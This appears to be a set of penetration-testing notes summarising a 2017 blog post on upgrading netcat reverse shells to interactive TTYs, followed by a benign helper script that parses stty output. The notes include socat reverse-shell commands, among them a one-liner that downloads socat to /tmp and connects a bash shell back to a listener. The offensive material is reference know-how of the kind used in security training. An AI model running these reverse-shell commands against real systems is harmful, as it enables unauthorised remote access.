Upgrading Simple Shells to Fully Interactive TTYs
by ropnop 2017
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
| Notes |
|---|
| “simple” shells running under netcat or a basic socket program/script have a suboptimal user experience |
| accidentally hitting Control-C will kill the session |
| tab completion doesn't work |
| can’t use any interactive programs such as a text editor or a pager |
| can’t use su or sudo |
| can’t use arrow keys |
| Pentest Monkey - Post-exploitation without a TTY http://pentestmonkey.net/blog/post-exploitation-without-a-tty |
| Phineas Fisher Hacks Catalan Police Union Website https://www.youtube.com/watch?v=oI_ZhFCS3AQ#t=25m53s |
| Phineas Fisher - Hackingteam Writeup http://pastebin.com/raw/0SNSvyjJ |
| Kali Linux |
| reverse shell |
| nc -e |
| netcat reverse shells |
| msfvenom - LHOST LPORT RPORT |
| Perl reverse shell |
| Python pty module |
| .. Control-C still kills session |
| .. lots of shell/tty features are still not available, but it's a better user experience than a vanilla reverse shell |
| socat is netcat on steroids |
| socat tty listener |
| .. listener: socat file:$(tty),raw,echo=0 tcp-listen:4444 |
| .. victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
| static-linked binaries: https://github.com/andrew-d/static-binaries |
| .. wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
| Phineas Fisher stty technique |
| .. catch a reverse shell with netcat -lp 4444 |
| .. background it with Control-Z after you catch the connection |
| .. echo $TERM; stty -a ### need the TERM type and console's size in rows/columns |
| .. stty raw -echo |
| .. fg ### bring the netcat session into the foreground |
| .. reset |
| .. export SHELL=bash |
| .. export TERM=TERM_FROM_COMMAND_ABOVE |
| .. stty rows ROWS_FROM_ABOVE columns COLUMNS_FROM_ABOVE |
| reverse shell cheat sheet |
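Added example, not from ropnop's post: a POSIX shell helper that parses rows/columns out of `stty -a` text (GNU coreutils on Linux output format assumed) and prints the export/stty lines from the stty technique above, so the values are not copied by hand. The sample stty output and the TERM value are constructed.

```shell
#!/bin/sh
# Constructed sample of `stty -a` output as printed by GNU coreutils on Linux
# (the first line carries the rows/columns the notes say to copy over).
SAMPLE_STTY='speed 38400 baud; rows 50; columns 200; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;'

# tty_fixup_cmds TERM STTY_OUTPUT
# Extract rows/columns from `stty -a` text and print the three fixup lines
# (SHELL, TERM, stty size) ready to paste into the upgraded shell.
# Returns 1 if the size cannot be found, so nothing half-formed is emitted.
tty_fixup_cmds() {
    term="$1"
    rows=$(printf '%s\n' "$2" | sed -n 's/.*rows \([0-9]*\);.*/\1/p' | head -n 1)
    cols=$(printf '%s\n' "$2" | sed -n 's/.*columns \([0-9]*\);.*/\1/p' | head -n 1)
    if [ -z "$rows" ] || [ -z "$cols" ]; then
        printf 'could not find rows/columns in stty output\n' >&2
        return 1
    fi
    printf 'export SHELL=bash\nexport TERM=%s\nstty rows %s columns %s\n' \
        "$term" "$rows" "$cols"
}

# Live use on the local (listening) terminal would be:
#   tty_fixup_cmds "$TERM" "$(stty -a)"
# Here the constructed sample is used so the script runs without a tty.
tty_fixup_cmds xterm-256color "$SAMPLE_STTY"
```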